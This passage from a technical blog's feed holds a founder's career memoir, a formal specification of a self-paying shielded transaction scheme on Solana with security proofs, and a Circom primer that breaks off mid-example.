- [Halo: Recursive Proof Composition without a Trusted Setup](https://eprint.iacr.org/2019/1021) — Bowe, Grigg, Hopwood (2019, last revised Feb 2020) — the paper Halo2 names itself after
- [PLONK: Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge](https://eprint.iacr.org/2019/953) — Gabizon, Williamson, Ciobotaru (2019) — the underlying arithmetisation
- [`privacy-scaling-explorations/halo2`](https://github.com/privacy-scaling-explorations/halo2) — the KZG fork that drove EVM adoption
- [`axiom-crypto/halo2-lib`](https://github.com/axiom-crypto/halo2-lib) — the gadget library to build on in 2026
- [Circom, by example](/blog/circom_by_example/) — the R1CS sister-substrate; useful comparison for arithmetisation cost models
- [On the death of the trusted setup](/blog/on_the_death_of_the_trusted_setup/) — why KZG is fine even in a transparent-setup era


---

# From sailor to CEO in three acts

Canonical: https://blog.skill-issue.dev/blog/sailor_to_ceo_three_acts/
Description: A short memoir of a strange decade — Navy reactor compartments, a bitcoin mine, ConsenSys-USAA-PMG, and the arc that ended at Zera Labs. The interesting question is not how I got here. It is where everyone else is going.
Published: 2026-05-01T08:00:00.000Z
Tags: career, narrative, navy, foundry, consensys, zera, memoir


This blog has accumulated, at this point, several long-form posts covering individual chapters of how I got from a Navy reactor compartment to running Zera Labs. The [Navy origin post](/blog/nuclear_reactors_taught_me_to_ship/). The [Foundry post](/blog/what_running_a_bitcoin_mine_taught_me/). The [founding letter](/blog/why_i_started_zera_labs/). The [CEO-still-shipping post](/blog/being_ceo_and_still_shipping_code/).

This is the shorter post that exists because *people who don't read the long posts* still ask the question. *How did the Navy guy end up building a ZK SDK?* The version that fits on LinkedIn. Three acts. One arc.

I'll keep it under two thousand words.

## Act one: the watch

I came up as a Nuclear Electronics Technician in the US Navy. The Navy nuclear pipeline is — there is no nice way to say this — an unreasonable amount of school. You go through a screening that washes out most of the people who applied. Then you go through Nuclear Power School, which is twenty-six weeks of physics, reactor theory, thermo, fluids, and mathematics at a pace that is calibrated to break you exactly enough to find out whether you bend back. Then you go through prototype, where you actually run a real reactor, in a real plant, for thousands of hours of supervised watchstanding. Then you go to a hull, which is when the actual job starts.

Along the way you are taught — not as a soft skill, but as a hard skill — that the panel does not lie, the procedure is the contract, and the most dangerous person on the watchstation is the one who decides the indications are *probably* fine.

I got out with a stack of qualifications, a security clearance whose paperwork I am still slightly anxious about, and a bone-deep instinct for how safety-critical engineering is actually done. That instinct does not show up on a resume. You only see it when the system is on fire, and even then you only see it as the absence of panic.

If you want the long version: *[Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/).*

## Act two: the chips and the code

Out of the Navy, I took an unexpected detour through industrial Bitcoin mining at **Foundry Digital**. (`TODO: Dax confirm length of stint and exact role title — keeping the short version short here.`) ASICs in racks. Megawatts of power. Heat going out by every method physics allows. The unit economics live on a five-input spreadsheet, and the spreadsheet does not lie either.

The thing nobody tells you about working in mining operations is that *it is the closest thing the modern economy has to a reactor compartment*. The discipline transfers exactly. The watchstanding is the same. The brutal physical immediacy of a ten-thousand-amp electrical bus is a familiar object to a former reactor electronics tech. So I did a chapter, learned what I needed to learn about the depreciation curve and the cost of an electron, and moved on.

If you want the long version: *[What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/).*

After Foundry I went where most former-military, vaguely-technical thirty-somethings end up: into software. **PMG** first (`TODO: Dax confirm`). Then **USAA** (`TODO: Dax confirm`). Then **ConsenSys**, which is where the Web3 part of the story started — open-source work across the product surface, mentoring junior engineers, and starting to speak publicly at *Permissionless* and *EthGlobal* on developer experience and supply-chain risk.

The supply-chain risk thread is the one that became the [Rusty Pipes series](/blog/rusty_pipes/) on this blog — a research thread on Rust binaries injected into npm packages, which is the kind of attack that is funny on a slide and very much not funny in a customer's CI. The series is the longest-running thing I've written and the thing I am most consistently invited to talk about. It also lined up, in a way I did not plan, with the technical posture I'd later need at Zera Labs: *the moment your dependency surface is non-trivial, the registry becomes your threat model, not your library.*

In act two I learned to ship software the way the modern industry ships it. Continuous deployment. Cloud-native everything. PR review culture, sometimes good, sometimes bad. I learned what a senior IC actually does, then I learned what a staff engineer actually does, then I started to notice that the ceiling was not where the interesting problems were.

## Act three: the company

The third act starts with three things being true at the same time, in the same year. ZK got fast enough to be boring. Solana got cheap enough to make tokenisation a *naming* decision instead of a budgeting decision. AI agents stopped being demos and started being tools that needed to interact with money. Sitting at the intersection of those three things, I incorporated **Zera Labs**.

The technical surface — visible in [github.com/Dax911](https://github.com/Dax911) — is the [zera-sdk](https://github.com/Dax911/zera-sdk) (Solana-native ZK SDK with a Rust core), [zera-wallet-demo](https://github.com/Dax911/zera-wallet-demo) (Tauri 2 with Groth16 in WASM), [z_trade](https://github.com/Dax911/z_trade) (zeraswap — first compressed-token AMM on Solana), [zera_med_demo](https://github.com/Dax911/zera_med_demo) (a ZK-FHIR gateway because someone asked us to prove it works for things other than crypto bros), and a public Zera Design System we use across the product. Plus an MCP server for AI agents to call any of it. We are small (`TODO: Dax confirm headcount when comfortable disclosing`), the work is technically dense, and the schedule is short.

If you want the long version: *[Why I started Zera Labs](/blog/why_i_started_zera_labs/)*. If you want the inside-the-week version: *[Being CEO and still shipping code](/blog/being_ceo_and_still_shipping_code/)*.

## What the arc actually is

Looking at the three acts side by side, the arc is not "Navy guy gets into crypto." That is the LinkedIn-recruiter version. The actual arc is something narrower:

> Each chapter forced me to take seriously the gap between *the system is correct* and *I have correctly observed that the system is correct.*

In the Navy that gap is closed by watchstanding, two-person verification, and casualty drills. In mining it is closed by telemetry, redundant temperature sensors, and on-call. In software at scale (PMG → USAA → ConsenSys) it is closed by tests, code review, and post-mortems. In ZK it is closed by a Groth16 proof — a piece of math that *is* the closure of the gap. The whole story, condensed, is that I kept moving up the stack of "ways to know that the system is correct," and each step gave me a little more leverage than the last.

The reactor watchstander's tools are slow, expensive, and limited to a single plant. The miner's tools are faster and parallel, but only over a single workload. The senior IC's tools are general-purpose but soft — they assume an honest reviewer. The cryptographic tools at the end of the arc are general-purpose, fast, *and* don't assume an honest reviewer. They are, in a real sense, what every prior chapter was reaching for.

If I had to pin the arc to one sentence I'd say: *I have spent fifteen years getting better at proving that systems are doing what they claim to be doing*, and the most productive place to do that work, today, is at a company whose entire surface is about producing those proofs.

## What I'd tell my younger selves

Three notes to three different versions of me — because I find this is the most useful summary for people whose careers are a few chapters earlier than mine.

To the kid in the reactor compartment: the discipline you are absorbing is the most valuable thing you are going to learn, and you will not realise this until you have been out for five years. Don't lose the watchstanding habits. Don't soften the procedure-in-hand instinct. Find a civilian career where they still apply.

To the operator at the mining site: pay attention to the unit economics. The five-input spreadsheet is a model that generalises beyond mining. Carry it with you. Whatever business you eventually find yourself in, you will be able to think about it more clearly than the people around you because you have seen what real unit economics actually look like.

To the senior IC at ConsenSys: the Rusty Pipes work is the start of a research thread, not the end of one. Don't drop it after the first post. The supply-chain question is going to be one of the defining infrastructure problems of the next decade, and you are early.

To present me: don't get cocky.

## And to the reader

That's how I got here. The interesting question, though, is not how I got here. It is where everyone else is going.

If you came up the same way — Navy, military, technical — and you are thinking about the civilian transition, my email is at the bottom of every page. Reach out. The civilian-tech industry will tell you a lot of things about your discipline, almost none of them flattering, almost none of them correct. The reactor instincts are a superpower in a software org that has lost them. Bring them with you.

If you are a senior IC who is wondering whether to keep going up the staff ladder or jump sideways into a founder seat, I hope the [CEO-still-shipping post](/blog/being_ceo_and_still_shipping_code/) is useful. The math is not as bad as the canon makes it sound.

If you are at the third act yourself, building cryptographic infrastructure or anything adjacent, I want to know. The ecosystem is small enough that we should know each other.

And if you are at the very beginning — looking at a screening package, or a Navy recruiter, or a dev bootcamp acceptance, or a first software job — pick the chapter that gives you the deepest *forcing function*. Pick the chapter that demands the most discipline up front. The discipline is the thing that compounds. The technology is the thing that changes.

That's the LinkedIn version. The longer versions are linked above. Thanks for reading.


---

# SPST: a self-paying shielded transaction model

Canonical: https://blog.skill-issue.dev/blog/spst_self_paying_shielded_transactions/
Description: First construction in F_RP. The SPST relation, balance conservation under DLOG, double-spend resistance under collision-resistant PRF, unlinkability under DDH, simulation-extractable non-malleability.
Published: 2026-04-30T17:30:00.000Z
Tags: zk, cryptography, pedersen, groth16, zcash, solana, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

In the [previous post](/blog/the_fee_paradox/) I argued that on account-model chains the fee paradox is what forces relayer dependence. The cleanest resolution — Approach A — extracts the transaction fee from inside the ZK proof itself. This post specifies that resolution.

The construction is called **SPST** (Self-Paying Shielded Transactions). It is the foundation that PPST, TAB, and UPEE build on. It also stands alone as a complete protocol for private value transfer with self-paying fees — the Solana analogue to Zcash's Sapling spend description, but adapted to a smart-contract environment.

<Aside kind="note">
Post 3 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. Reading [post 1](/blog/relayerless_privacy_intro/) and [post 2](/blog/the_fee_paradox/) first will give you context, but this post is technically self-contained.
</Aside>

## The setting

Work over a prime-order elliptic curve group $\mathbb{G}$ of order $p$ with two independent generators $g, h \in \mathbb{G}$ for which no party knows $\log_g h$. Let $\mathbb{F}_p$ denote the scalar field. We use:

- **Poseidon** as the SNARK-friendly hash (width $t = 5$, HADES rounds $R_F = 8$ full + $R_P = 57$ partial, S-box $x^5$, ~324 R1CS constraints per 2-to-1 compression).
- **PRF** keyed by $sk \in \mathbb{F}_p$, instantiated as a domain-separated Poseidon evaluation.
- **Groth16** over BN254 as the on-chain verifier (alt_bn128 syscalls on Solana).
- **Indexed Merkle Trees** for nullifier non-membership (depth-32 over 254-bit values; ~10,948 R1CS constraints per non-membership proof, vs 82,296 for naive sparse Merkle).

## Definitions

**Definition 3.1 (Shielded Note).** A *shielded note* is a tuple

$$
  \mathsf{note} = (\mathsf{pk}, v, \rho, r)
$$

where $\mathsf{pk} = \mathsf{PRF}_{sk}(0)$ is the owner's public spending key, $v \in \{0, \ldots, 2^{64}-1\}$ is the note value, $\rho \in \mathbb{F}_p$ is unique per-note serial randomness, and $r \in \mathbb{F}_p$ is the commitment trapdoor.

**Definition 3.2 (Note Commitment).**

$$
  \mathsf{cm} \;=\; \mathsf{Poseidon}(\mathsf{pk},\, v,\, \rho,\, r) \;\in\; \mathbb{F}_p.
$$

Note commitments are appended as leaves to a global Merkle tree $\mathcal{T}$ of depth $d = 32$ (capacity $2^{32}$ notes). The Merkle root at any epoch is $\mathsf{rt}$.

**Definition 3.3 (Nullifier).**

$$
  \mathsf{nf} \;=\; \mathsf{PRF}_{sk}(\rho) \;=\; \mathsf{Poseidon}(sk, \rho).
$$

Upon spending, $\mathsf{nf}$ is published to a global nullifier set $\mathcal{N}$. Double-spending is prevented by rejecting any transaction whose $\mathsf{nf}$ already lives in $\mathcal{N}$.

**Definition 3.4 (SPST Transaction).** With $n$ inputs and $m$ outputs:

$$
  \mathsf{tx} \;=\; \bigl(\, \{\mathsf{nf}_i\}_{i=1}^{n},\; \{\mathsf{cm}_j\}_{j=1}^{m},\; \mathsf{rt},\; f,\; \pi \,\bigr)
$$

where $f \in \{0, \ldots, 2^{64}-1\}$ is the public fee and $\pi$ is a Groth16 proof of the SPST relation.

The validator accepts iff (i) $\pi$ verifies, (ii) $\mathsf{rt}$ is a recent root, (iii) every $\mathsf{nf}_i \notin \mathcal{N}$, and (iv) $f \geq f_{\min}$.

## The SPST relation

The relation $\mathcal{R}_{\mathsf{SPST}}$ is the set of $(x, w)$ pairs:

**Public instance** $x = \bigl(\{\mathsf{nf}_i\}, \{\mathsf{cm}_j\}, \mathsf{rt}, f\bigr)$.

**Private witness** $w = \bigl(\{(\mathsf{note}_i, \mathsf{path}_i, sk_i)\}, \{\mathsf{note}'_j\}\bigr)$.

Eight constraints, all enforced by the circuit:

| # | Name | Constraint |
|---|------|-----------|
| C1 | Spending key validity | $\mathsf{pk}_i = \mathsf{PRF}_{sk_i}(0)$ |
| C2 | Nullifier correctness | $\mathsf{nf}_i = \mathsf{PRF}_{sk_i}(\rho_i)$ |
| C3 | Input commitment well-formedness | $\mathsf{cm}^{(\mathsf{in})}_i = \mathsf{Poseidon}(\mathsf{pk}_i, v_i, \rho_i, r_i)$ |
| C4 | Merkle membership | $\mathsf{MerkleVerify}(\mathsf{rt}, \mathsf{cm}^{(\mathsf{in})}_i, \mathsf{path}_i) = 1$ |
| C5 | Output commitment well-formedness | $\mathsf{cm}_j = \mathsf{Poseidon}(\mathsf{pk}'_j, v'_j, \rho'_j, r'_j)$ |
| **C6** | **Value conservation with fee** | $\sum_i v_i = \sum_j v'_j + f$ |
| C7 | Non-negative output values | $v'_j \in \{0, \ldots, 2^{64}-1\}$ (bit decomposition) |
| C8 | Non-negative fee | $f \in \{0, \ldots, 2^{64}-1\}$ |

C6 is the load-bearing constraint. It is what makes the transaction self-paying: the prover can only produce a valid proof if the input notes' values sum to exactly the output values plus the fee.

## The self-paying property (Theorem 3.1)

**Theorem.** Let $\mathsf{tx} = (\{\mathsf{nf}_i\}, \{\mathsf{cm}_j\}, \mathsf{rt}, f, \pi)$ be a valid SPST transaction. Then:

1. The fee $f$ is funded entirely from consumed shielded notes.
2. No external account, relayer, or gas sponsor is required.
3. Validators extract $f$ as inclusion compensation without learning the private inputs/outputs beyond $f$ itself and the validity of $\pi$.

**Proof sketch.** (1) follows directly from C6. (2) follows because $\mathsf{tx}$ is a self-contained data structure that any party can broadcast; the on-chain verifier decrements the privacy program's lamport reserve by $f$ and credits the validator. (3) is the perfect zero-knowledge property of Groth16: the validator sees $f$ as a public input but learns nothing about $v_i$ or $v'_j$.

The full proof is in §3.1.3 of the paper. The takeaway: **on Solana, the privacy program's PDA holds a reserve. Each shield deposit increments it. Each SPST transaction's proof authorises the validator to take $f$ from it.** Replenishment is automatic.

## Theorem 3.2 — Balance / value conservation

**Statement.** No PPT adversary can produce a valid SPST transaction that creates value (i.e., one for which $\sum_j v'_j + f > \sum_i v_i$) except with negligible probability.

The proof gives two complementary arguments — one from the SNARK's knowledge soundness, one from an independent Pedersen commitment cross-check that provides defense in depth.

### Argument 1 (SNARK soundness)

C6 enforces $\sum_i v_i = \sum_j v'_j + f$ over $\mathbb{F}_p$. C7 and C8 enforce $v'_j, f \in [0, 2^{64})$. With at most $n \leq 2^{16}$ inputs each bounded by $2^{64}$, $\sum_i v_i < 2^{80} \ll p \approx 2^{254}$ — so field arithmetic faithfully represents integer arithmetic and no modular wraparound is possible.

By Groth16 knowledge soundness in the AGM, an extractor $\mathcal{E}$ can recover the witness $w^*$ satisfying all constraints C1–C8. C6 in the extracted witness gives $\sum_i v_i = \sum_j v'_j + f$ as an integer equation. Contradiction with the assumed inflation.

### Argument 2 (Pedersen cross-check)

As defense in depth, attach Pedersen value commitments to each note. With $C_{\mathsf{in},i} = v_i \cdot g + r^{(\mathsf{vc})}_i \cdot h$ and $C_{\mathsf{out},j} = v'_j \cdot g + r^{(\mathsf{vc})}_j \cdot h$, the verifier checks

$$
\sum_i C_{\mathsf{in},i} \;=\; \sum_j C_{\mathsf{out},j} \;+\; f \cdot g \;+\; r_\Delta \cdot h
$$

where $r_\Delta = \sum_i r^{(\mathsf{vc})}_i - \sum_j r^{(\mathsf{vc})}_j$.

Suppose an adversary passes this check but with $\sum_j v'_j + f \neq \sum_i v_i$. Let $\delta = \sum_i v_i - \sum_j v'_j - f \neq 0$. Then $\delta \cdot g = r'_\Delta \cdot h$ for some $r'_\Delta$, which yields $\log_g h = \delta / r'_\Delta$ — contradicting DLOG. ∎

## Theorem 3.3 — Double-spend resistance

**Game.** $\mathcal{A}$ may adaptively deposit and spend; wins if it produces two accepted transactions consuming the same note $\mathsf{note}^*$.

**Cases.**

- **Case 1:** The two transactions publish the same nullifier. Rejected by the protocol's nullifier-set check.
- **Case 2:** They publish different nullifiers $\mathsf{nf} \neq \mathsf{nf}'$ but consume the same note. By C4 both proofs authenticate the same commitment $\mathsf{cm}^*$. By C1 we have $\mathsf{pk}^* = \mathsf{PRF}_{sk^*}(0) = \mathsf{PRF}_{sk'}(0)$.
  - If $sk^* = sk'$, then $\mathsf{nf} = \mathsf{nf}'$. Contradiction.
  - If $sk^* \neq sk'$, then $\mathsf{Poseidon}(sk^*, 0) = \mathsf{Poseidon}(sk', 0)$ — a collision in Poseidon. Reduces to collision resistance.

Both cases reach a contradiction. ∎

## Theorem 3.4 — Transaction unlinkability

**Statement.** Under perfect zero-knowledge of Groth16 and computational hiding of Pedersen commitments under DDH, the SPST scheme satisfies transaction unlinkability: no PPT adversary can determine which input notes fund which output notes with non-negligible advantage.

**Proof structure.** Hybrid argument:

- **Hybrid 0**: real game.
- **Hybrid 1**: replace all Groth16 proofs with simulated proofs. By perfect ZK of Groth16, indistinguishable.
- **Hybrid 2**: in the simulated view, the multisets of nullifiers, commitments, roots, fees are identical for both branchings of the challenge. The fee is identical by construction. Each $\mathsf{cm}_j = \mathsf{Poseidon}(\mathsf{pk}'_j, v'_j, \rho'_j, r'_j)$ with fresh random $r'_j$ is computationally indistinguishable from a uniform field element. Each nullifier $\mathsf{nf}_i = \mathsf{PRF}_{sk_i}(\rho_i)$ with unique $\rho_i$ is pseudorandom. The Pedersen value commitments are computationally hiding under DDH.

Result: $\mathsf{Adv}_{\mathcal{A}} \leq \mathsf{negl}(\lambda)$. ∎

## Theorem 3.5 — Non-malleability

**Statement.** No PPT adversary can take a valid SPST transaction and produce a *distinct* valid transaction with altered public inputs (e.g., a different fee), except with negligible probability.

**Proof.** Relies on the **simulation-extractability** of Groth16 in the Random Oracle Model — the Bowe-Gabizon construction (2019), refined by Ràfols-Baghery-Pindado (2023). An adversary mauling the proof to alter $f$ would need to extract a witness with a *different* $f'$ satisfying C6, but C6 plus the unchanged input commitments and output commitments uniquely determines $f$. Contradiction.

## Circuit complexity

For an SPST circuit with $n$ inputs and $m$ outputs:

$$
C_{\mathsf{total}} \;\approx\; 11{,}500 \cdot n \;+\; 452 \cdot m \;+\; 64.
$$

A canonical 2-in / 2-out transaction:

$$
C_{2,2} \;=\; 23{,}000 + 904 + 64 \;\approx\; 24{,}000 \text{ constraints}.
$$

| Component | Per-input | Per-output | Subtotal |
|-----------|-----------|------------|----------|
| Note commitment (input) | 388 | — | $388n$ |
| Merkle path (depth 32) | 10,400 | — | $10{,}400n$ |
| PRF evaluations (pk + nf) | 648 | — | $648n$ |
| Range proof (input value) | 64 | — | $64n$ |
| Note commitment (output) | — | 388 | $388m$ |
| Range proof (output value) | — | 64 | $64m$ |
| Fee range proof | — | — | 64 |

On commodity hardware (Apple M2, 8-core), Groth16 proving for ~24,000 constraints takes **0.5–1.5 seconds** with arkworks or snarkjs. Proof size is **128 bytes** compressed (BN254 G1/G2 compression on Solana). Verification is **~150,000–200,000 CU** via `sol_alt_bn128_*` syscalls.

<TradeoffTable rows={[
  { aspect: 'Proof size',                    pros: '128 bytes (BN254 compressed)',          cons: 'Fits the 1,232-byte Solana limit with 1,100+ bytes for other tx data' },
  { aspect: 'Verification cost',             pros: '< 200,000 CU (≈ $0.02 USD)',            cons: '~14% of the 1.4M CU per-tx budget; leaves room for nullifier checks + state updates' },
  { aspect: 'Prover time (M2 laptop)',       pros: '0.5–1.5 s for 2-in / 2-out',            cons: 'Linear in circuit size; recursive proofs amplify this' },
  { aspect: 'Trusted setup',                 pros: 'Per-circuit Groth16 MPC (Powers of Tau-style)', cons: 'Separate ceremony per circuit shape; PLONK alternative awaits SIMD-0302 G2 syscall' },
]}/>

## What SPST is not

SPST handles private *value transfer* — the Solana analogue of Zcash's Sapling. It does **not**:

- Handle private *computation*. The next post ([PPST](/blog/ppst_private_programmable_state/)) extends the relation to arbitrary arithmetic circuits over private state.
- Hide the *submitter*. The transaction submitter is still publicly identified by their Ed25519 signature on the wrapping Solana transaction. [TAB](/blog/tab_threshold_anonymous_broadcast/) addresses that.
- Hide the *fee amount*. $f$ is necessarily public for validator compensation.

But it does the load-bearing thing: the user becomes self-sovereign with respect to fee payment. Combined with TAB and PPST, that's the whole framework.

## Bibliography

- Ben-Sasson, E. et al. (2014). *Zerocash.* IEEE S&P 2014. https://eprint.iacr.org/2014/349
- Hopwood, D. et al. (2016–2026). *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Groth, J. (2016). *On the Size of Pairing-based Non-interactive Arguments.* EUROCRYPT 2016. https://eprint.iacr.org/2016/260
- Bowe, S., Gabizon, A. (2019). *Making Groth's zk-SNARK Simulation Extractable.* https://eprint.iacr.org/2019/197
- Ràfols, C., Baghery, K., Pindado, Z. (2023). *Simulation Extractable versions of Groth's zk-SNARK Revisited.* https://doi.org/10.1007/s10207-023-00750-7
- Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991.
- Grassi, L. et al. (2021). *Poseidon: A New Hash Function for Zero-Knowledge Proof Systems.* USENIX Security 2021. https://eprint.iacr.org/2019/458
- Aztec Documentation. *Indexed Merkle Tree (Nullifier Tree).* https://docs.aztec.network/

Previous: [The fee paradox ←](/blog/the_fee_paradox/) · Next: [PPST: private programmable state →](/blog/ppst_private_programmable_state/)


---

# Circom, by example

Canonical: https://blog.skill-issue.dev/blog/circom_by_example/
Description: A DSL primer told through one circuit — proving knowledge of a Poseidon pre-image. Every Circom keyword annotated as it appears, the constraint graph drawn out, and the R1CS fall-through to a witness.
Published: 2026-04-30T13:00:00.000Z
Tags: circom, dsl, r1cs, zk, snark, poseidon, phd


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

There are two ways to write a zero-knowledge circuit. You can spell out the algebraic constraints by hand — `(a) * (b) === c`, one line per multiplication, every wire indexed manually — or you can write something that *reads like a program* and let a compiler emit the constraints. The first approach gives you total control and zero leverage. The second approach gives you Circom.

Circom is the DSL Iden3 designed in 2018 to make Groth16-style circuit authoring tractable. Six years later, in 2026, it is still the language most production ZK pipelines reach for first. The reason is not that it is the most expressive — Halo2 and the Noir frontend [Aztec](https://aztec.network) ships are both more powerful — but that its compilation target (R1CS) is the format every Groth16 toolchain on Earth speaks, and its tooling (snarkjs, circomlib, circomlibjs) is the deepest in the ecosystem.

This post is a walk through Circom from the inside out, told via one circuit: *prove I know `x` such that `Poseidon(x, 0) == y` without revealing `x`*. Pre-image of a hash. The "hello world" of shielded systems. By the end you'll have read every Circom keyword that matters, seen the constraint graph it generates, and watched the witness get computed in your browser.

<Aside kind="note">
This is a practitioner's tour, not a language spec. The canonical reference is [the Circom 2 documentation](https://docs.circom.io) and the language paper is [Bellés-Muñoz et al. (2022)](https://www.techrxiv.org/articles/preprint/CIRCOM_A_Robust_and_Scalable_Language_for_Building_Complex_Zero-Knowledge_Circuits/19374986). What follows is the model I keep in my head when reading or writing Circom in 2026.
</Aside>

## What R1CS actually is, in five paragraphs

Before any DSL, the substrate.

A **rank-1 constraint system** is a list of constraints of the form

$$
(\mathbf{a}_i \cdot \mathbf{w})\,(\mathbf{b}_i \cdot \mathbf{w}) - (\mathbf{c}_i \cdot \mathbf{w}) = 0
$$

where $\mathbf{w}$ is the **witness vector** (every wire in your circuit, including inputs, outputs, intermediates, and a leading constant `1`), and $\mathbf{a}_i, \mathbf{b}_i, \mathbf{c}_i$ are constant vectors that pick out which wires participate in the *i*-th constraint. Every constraint is of the form *(linear combination)* × *(linear combination)* = *(linear combination)*. Hence "rank 1": each side is at most one multiplication.

What this *means* is: every constraint can express **exactly one multiplication of two wires**, plus arbitrary additions and constant scalings on either side. `(2*x + 3*y) * (z) === w + 1` is one R1CS constraint. `x * y * z === w` is two — you need an intermediate `t = x*y` and then `t * z === w`. You can feel the shape of the cost function: addition is free, multiplication is expensive.

Why this exact shape? Because Groth16 (and its predecessors in the Pinocchio/QAP family) reduces an R1CS to a polynomial-divisibility check, and that reduction works exactly when each constraint is rank 1. The circuit's *number of constraints* becomes the dominant factor in proof time and zkey size. Constraints, not wires, not gates.

In production Circom, you'll see constraint counts ranging from ~50 (a single range check) to ~10,000 (a Merkle-32 path with Poseidon nodes) to ~2,000,000 (a circuit verifying an EVM block). Every increment is a multiplication that someone wrote, intentionally or not. **A good Circom programmer thinks like an accountant.**

The witness is generated *outside* the constraint system, by a witness-generator program the Circom compiler emits as WebAssembly. The constraint system *checks* the witness; it does not compute it. This separation is fundamental to how SNARKs work: prover knows everything, verifier checks much less.

## A first circuit — knowledge of a Poseidon pre-image

```circom
pragma circom 2.1.5;

include "circomlib/poseidon.circom";

template KnowsPreimage() {
    signal input x;             // private witness — the value being hidden
    signal output y;            // public output — the published hash

    component hash = Poseidon(2);   // 2-input Poseidon hash gadget
    hash.inputs[0] <== x;            // wire x in
    hash.inputs[1] <== 0;            // pad with 0
    y <== hash.out;                  // expose the result
}

component main { public [y] } = KnowsPreimage();
```

That's the whole circuit. Every keyword, in order:

- `pragma circom 2.1.5` — version pin. Circom is post-1.0; the language has minor breaking changes between minor versions, and circomlib's gadgets target specific ranges. Pin or suffer.
- `include "circomlib/poseidon.circom"` — the include resolves against the `--node-modules` flag or `circomlib`'s install path. Includes are textual — there's no module system in the npm sense, only file inclusion.
- `template KnowsPreimage()` — a parameterised circuit fragment. Templates are like generic functions: you instantiate them with `component foo = KnowsPreimage();`. The lowercase/uppercase convention (Templates uppercase, components lowercase) is community style, not enforced.
- `signal input x;` — a wire that flows *in* to this template. `signal output y;` — flows *out*. Without `input` or `output`, `signal foo;` is an internal wire.
- `component hash = Poseidon(2);` — instantiate a sub-circuit. `Poseidon` is a template defined in circomlib; the `(2)` is its parameter (number of inputs). Components compose hierarchically; the compiler inlines them at constraint-emission time.
- `hash.inputs[0] <== x;` — the **constraint operator**. `<==` does *two* things at once: it (a) emits the R1CS constraint that wires `x` and `hash.inputs[0]` are equal, and (b) marks the right-hand side as the source for witness generation (so the WASM witness generator knows to copy `x`'s value into `hash.inputs[0]`).
- `y <== hash.out;` — same operator, exposing the hash output.
- `component main { public [y] } = KnowsPreimage();` — the entry point. The `public` annotation says: when the verifier checks the proof, `y` is the public input. Everything else (here, just `x`) is private to the prover.

Three operators every Circom programmer types daily:

| Operator | What it does | Witness side | Constraint side |
|---|---|---|---|
| `<--` | witness only | assigns | no constraint emitted |
| `===` | constraint only | no witness assignment | emits constraint |
| `<==` | both | assigns | emits constraint |

`<--` shows up when you compute something the constraint system can't (square-root, division, lookup) and then post-hoc constrain it with `===`. `===` shows up alone when the relationship is implicit and you want to assert it. `<==` is the day-to-day workhorse.

<Aside kind="warn">
The most common Circom bug — and I have shipped this bug myself — is using `<--` without a follow-up `===`. The witness will be generated correctly, your tests will pass, and your circuit will be **completely insecure** because the prover is free to put any value there. Audit checklists treat `<--` without a paired constraint as a red flag.
</Aside>

## What that circuit compiles to

The Circom compiler (`circom2`) emits four artifacts:

1. **`circuit.r1cs`** — the constraint system, in a binary format the rest of the toolchain consumes.
2. **`circuit.wasm`** — the witness generator, a WASM module that takes the inputs as JSON and returns the witness vector.
3. **`circuit.sym`** — symbol table mapping wire indices back to source-code names. Invaluable for debugging.
4. **`circuit.json`** *(optional, `--json`)* — the constraint system in human-readable JSON. Slow to parse; useful for one-off inspection.

For our pre-image circuit, the R1CS file contains roughly the constraints below — Poseidon's S-box rounds, MDS multiplications, output binding. The constraint graph looks like this:

<Mermaid chart={`flowchart TB
  X[private input x] --> H0[Poseidon input 0]
  Z[constant 0] --> H1[Poseidon input 1]
  H0 --> S1[round 1 S-box]
  H1 --> S1
  S1 --> M1[MDS mix]
  M1 --> S2[round 2 S-box]
  S2 --> M2[...64 more rounds...]
  M2 --> O[Poseidon output]
  O --> Y[public output y]
  classDef pub fill:#0a4014,stroke:#4ade80,color:#fff
  classDef priv fill:#3a0a0a,stroke:#f87171,color:#fff
  class Y pub
  class X priv`}/>

Total constraint count for `KnowsPreimage` against BN254-Poseidon-128 with $t=3, R_F=8, R_P=57$: **243 constraints** for the hash, plus ~3 for the input wiring. Call it 246 R1CS constraints. snarkjs Groth16 will prove it in under 80 ms in a browser, including witness generation. (Numbers from [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/).)

## Compile and run, in your browser

`circomlibjs` ships a browser build that includes the witness generator and the Poseidon constants without requiring you to install the Rust-based `circom2` compiler. Below is a Sandpack `node` template that takes the inputs to our circuit, computes the witness, and emits the expected hash. It's not a full proof — the proving step needs the zkey, which is megabytes — but it's the *witness generation* half of the pipeline, end-to-end, in a browser.

<Sandbox
  template="node"
  title="Knowledge of pre-image — witness generation"
  files={{
    "/index.js": `// Witness generation for "I know x such that Poseidon(x, 0) = y"
// using circomlibjs in pure Node/browser. This skips the proving step
// (which needs a multi-MB zkey) and shows the witness side.

const { buildPoseidon } = require("circomlibjs");

async function main() {
  // Build the Poseidon hasher (this fetches the round constants).
  const poseidon = await buildPoseidon();
  const F = poseidon.F;  // the BN254 scalar field

  // The "private" input — what we want to keep hidden.
  const x = 1234567890n;

  // The two-input Poseidon, mirroring our Circom circuit.
  const yField = poseidon([x, 0n]);
  const y = F.toString(yField);

  // What the prover would put in input.json:
  const proverInput = {
    x: x.toString(),
  };
  // What the verifier sees on-chain:
  const publicInput = [y];

  console.log("circuit:        KnowsPreimage()");
  console.log("private input:  x =", x.toString());
  console.log("public output:  y =", y);
  console.log();
  console.log("input.json (prover only):");
  console.log(JSON.stringify(proverInput, null, 2));
  console.log();
  console.log("public.json (verifier sees this):");
  console.log(JSON.stringify(publicInput, null, 2));
  console.log();
  console.log("constraint count: ~246 (243 Poseidon + 3 wiring)");
  console.log("expected snarkjs prove time @ Merkle-32 quality:");
  console.log("  ~80 ms (browser, threads on)");
  console.log("  ~25 ms (arkworks-WASM, threads on)");
  console.log("  ~3 ms  (native Rust)");
}

main().catch(console.error);
`,
    "/package.json": `{
  "name": "circom-preimage-witness",
  "version": "1.0.0",
  "main": "index.js",
